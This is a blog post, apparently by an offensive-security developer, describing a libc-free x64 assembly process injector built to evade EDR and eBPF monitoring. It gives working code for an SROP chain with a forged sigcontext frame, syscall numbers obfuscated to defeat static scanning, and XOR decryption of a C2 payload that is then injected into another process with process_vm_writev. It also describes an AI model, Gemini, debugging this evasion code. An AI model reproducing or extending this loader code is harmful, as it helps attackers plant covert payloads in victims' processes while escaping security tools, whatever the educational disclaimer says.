Research Context
When developing offensive security tools—specifically loaders and C2 agents—the biggest hurdle is always the noise you generate. Modern EDRs, Falco eBPF monitors, and kernel-level telemetry are incredibly adept at catching standard injection techniques. If you use standard ptrace routines (like PTRACE_POKEDATA) or rely on high-level C libraries (libc), you light up monitoring dashboards like a Christmas tree.
While architecting the Phantom-Evasion-Loader, a standalone x64 Advanced Process Injector, I wanted to drastically reduce this detection surface. The solution? Dropping libc entirely and writing pure x64 Assembly. But pure Assembly isn’t enough; you need the right execution flows.
In modern malware architecture, two techniques are heavily utilized to achieve this stealth: SROP (Sigreturn Oriented Programming) and Zero-Copy Injection via process_vm_writev. Here is how they work together, and the debugging hell required to implement them.
Context Hijacking: Why SROP?
Normally, when you invoke a syscall, EDRs hook the transition points to inspect what you are doing. SROP flips this dynamic.
SROP leverages rt_sigreturn (Syscall 15). On Linux, when a signal handler finishes, rt_sigreturn is called to restore the CPU to its exact state before the signal was delivered. The kernel does this by reading a signal frame from the user stack, including a sigcontext structure that holds all general-purpose register values, and loading those values into the CPU registers.
By artificially crafting a fake sigcontext frame on the stack and calling rt_sigreturn, we achieve arbitrary context hijacking.
- The Advantage: We hide the actual syscall we want to execute. Instead of sequentially setting up registers for a malicious call and triggering a syscall instruction that gets flagged, we just format the stack. sigreturn dumps those values directly into the CPU, instantly transitioning execution to our desired state with our desired syscall loaded into rax. It significantly minimizes ptrace noise and context hijacking footprints.
Real-World SROP Trigger in Pure Assembly
To execute SROP, we must dynamically craft the sigcontext structure. In the snippet below from the Phantom engine, rbp acts as the base pointer for our fake frame. We set our target registers, calculate the rip for the next phase (x8_syscall), pivot the stack pointer (rsp), and call Syscall 15.
Notice how the next syscall (wait4, which is 61) is also slightly obfuscated (58 + 3) to avoid static opcode scanning for obvious syscall numbers.
; --- Real-World SROP Chain Example ---
; Dynamically building the sigcontext and jumping to the next phase
x7_syscall:
syscall ; Execute previous syscall in the chain
; Crafting the fake sigcontext frame (rbp points to our frame base)
mov qword [rbp + 0x68], 9 ; rsi = PTRACE_SINGLESTEP (Offset 0x68)
mov qword [rbp + 0x88], 0 ; rax = 0
mov qword [rbp + 0x38], 0 ; r8 = 0
lea rax, [rel x8_syscall] ; Calculate RIP for the next execution phase
mov [rbp + 0xA8], rax ; rip = x8_syscall (Offset 0xA8 in sigcontext)
mov rsp, rbp ; Align rsp to our crafted sigcontext frame
mov rax, 15 ; __NR_rt_sigreturn (Syscall 15)
syscall ; Trigger SROP. Context is overwritten, execution jumps!
x8_syscall:
; We land here with our registers fully controlled by the SROP frame
syscall
; Obfuscated Syscall Loading
mov rax, 58
add rax, 3 ; rax = 61 (__NR_wait4)
mov rdi, r13 ; rdi = target PID (preserved in r13)
xor rsi, rsi ; wstatus = NULL
xor rdx, rdx ; options = 0
xor r10, r10 ; rusage = NULL
syscall ; Execute wait4
The Silent Courier: process_vm_writev (Syscall 311)
Once you have control, you need to get your payload into the target process. This is where the Zero-Copy technique comes in using process_vm_writev (Syscall 311).
Unlike standard write operations that copy data from user space to a kernel buffer, and then to the target user space, process_vm_writev writes data directly from the local process memory to the remote process memory.
- The Disadvantage: It is strictly a memory write operation. It cannot allocate memory or change execution permissions on its own.
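- The Advantage: It avoids PTRACE_POKEDATA monitoring, because no ptrace write requests are issued. When chained properly, it allows you to slide your XOR-encrypted shellcode into the target space with far less noise. The call is still subject to the kernel's ptrace access-mode check on the target process, and the syscall itself remains visible to syscall-level tracing.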
While Syscall 311 can’t do the job alone, when paired with an SROP chain to handle the memory permissions and execution flow, it becomes a devastatingly quiet injection method.
Real-World Payload Decryption & Zero-Copy Injection
In a practical evasion scenario, the payload should never sit in memory in plaintext. Below is the phase from the Phantom loader where the payload is decrypted in-memory (using a QWORD XOR key) immediately before being silently copied into the target process using process_vm_writev.
By structuring local_iov and remote_iov via relative addressing (rel), we keep the code Position Independent (PIC).
; =========================================================================
; PHASE 3: PAYLOAD DECRYPTION & INJECTION (The 'process_vm_writev' Way)
; =========================================================================
; 1. IN-MEMORY DECRYPTION
; Decrypt the payload within the loader's own memory space first.
mov r12, 1632 ; Payload size (example)
lea r9, [rel c2_payload]
mov r14, 0xACDAABBBA2BC1337 ; 8-Byte (QWORD) XOR Key
_decrypt_local_loop:
mov r10, [r9]
xor r10, r14 ; Decrypt
mov [r9], r10 ; Write decrypted data back to Loader's memory
add r9, 8
sub r12, 8
jg _decrypt_local_loop
; 2. ZERO-COPY INJECTION (process_vm_writev)
lea rax, [rel c2_payload]
mov [rel local_iov], rax ; iov_base = local decrypted payload address
mov qword [rel local_iov + 8], 1632 ; iov_len = Shellcode size
mov rbx, qword [c2_address] ; Remote address (previously allocated via mmap)
mov [rel remote_iov], rbx ; iov_base = Remote target address
mov qword [rel remote_iov + 8], 1632 ; iov_len = Write size
; Fire Syscall 311!
mov rax, 311 ; sys_process_vm_writev
mov rdi, r13 ; Target PID
lea rsi, [rel local_iov] ; Local IOV struct address
mov rdx, 1 ; 1 local IOV
lea r10, [rel remote_iov] ; Remote IOV struct address
mov r8, 1 ; 1 remote IOV
mov r9, 0 ; Flags (0)
syscall
Debugging Hell: Blood, Sweat, and Hidden Opcodes
Writing this logic in pure x64 Assembly is a punishing experience. You are not dealing with compiler warnings; you are dealing with segmentation faults that give you absolutely zero context.
During the debugging phase of the Phantom loader, I lost hours to what I call “invisible opcode” syndrome. Because you are manually aligning the stack for the sigcontext structure, a single misaligned byte or an easily overlooked opcode will cause the kernel to reject the sigreturn or corrupt the execution flow.
I had instances where perfectly logical code would result in a crucial register getting clobbered by an off-by-one error right before the syscall. Human eyes start to glaze over after looking at hex dumps and GDB traces for 8 hours straight.
A Quick Shoutout: I have to give credit where it’s due. When my eyes were bleeding from staring at register states and stack alignments, I fed the raw opcode traces and GDB outputs into Google’s Gemini. It acted as a flawless secondary set of eyes, instantly spotting the microscopic register clashing and opcode misalignments that were burying the payload. If you are doing pure Assembly exploitation, having an AI comb through your opcode offsets is a game-changer.
Conclusion and Open Source
Implementing SROP and Zero-Copy injections in pure, libc-free Assembly is not for the faint of heart. It requires a masochistic love for low-level architecture. However, the resulting stealth makes it highly applicable for testing the resilience of modern eBPF and EDR solutions.
You can examine the full source code, the XOR-decryption logic, and the SROP implementation on my GitHub.
Project: Phantom-Evasion-Loader (Standalone x64)
Disclaimer: This research and the associated source code are intended strictly for educational purposes, authorized security auditing, and developing better defensive heuristics.